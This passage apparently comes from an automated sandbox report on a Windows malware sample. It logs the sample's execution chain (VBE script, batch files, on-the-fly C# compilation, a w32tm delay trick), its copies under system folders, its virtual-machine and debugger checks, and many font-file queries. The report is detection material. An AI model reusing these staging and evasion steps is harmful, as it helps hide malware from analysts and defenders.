                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595703
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595593
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595484
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595375
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595265
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595142
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595015
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594906
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594793
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594578
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594468
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594250
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594140
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594030
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593921
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593751
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593424
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593187
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593078
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592969
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592844
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592624
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592515
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592406
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592172
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592062
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591951
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591843
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591618
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2936883785.000000001ACB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                                    Source: w32tm.exe, 00000024.00000002.1968593673.000002495B6D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                                    Source: bridgeportDhcpcommon.exe, 00000005.00000002.1935495899.000000001C26B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                                    Source: bridgeportDhcpcommon.exe, 00000005.00000002.1935537060.000000001C27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: 544WP3NHaP.exe, 00000000.00000003.1654790197.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1869299662.0000000003421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: 544WP3NHaP.exe, 00000000.00000003.1654790197.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\f
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeAPI call chain: ExitProcess graph end nodegraph_0-23661
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008BF838
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008C7DEE mov eax, dword ptr fs:[00000030h]0_2_008C7DEE
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008CC030 GetProcessHeap,0_2_008CC030
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess token adjusted: Debug
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess token adjusted: Debug
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008BF838
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF9D5 SetUnhandledExceptionFilter,0_2_008BF9D5
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008BFBCA
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008C8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008C8EBD
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: page read and write | page guard
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF654 cpuid 0_2_008BF654
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_008BAF0F
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe VolumeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
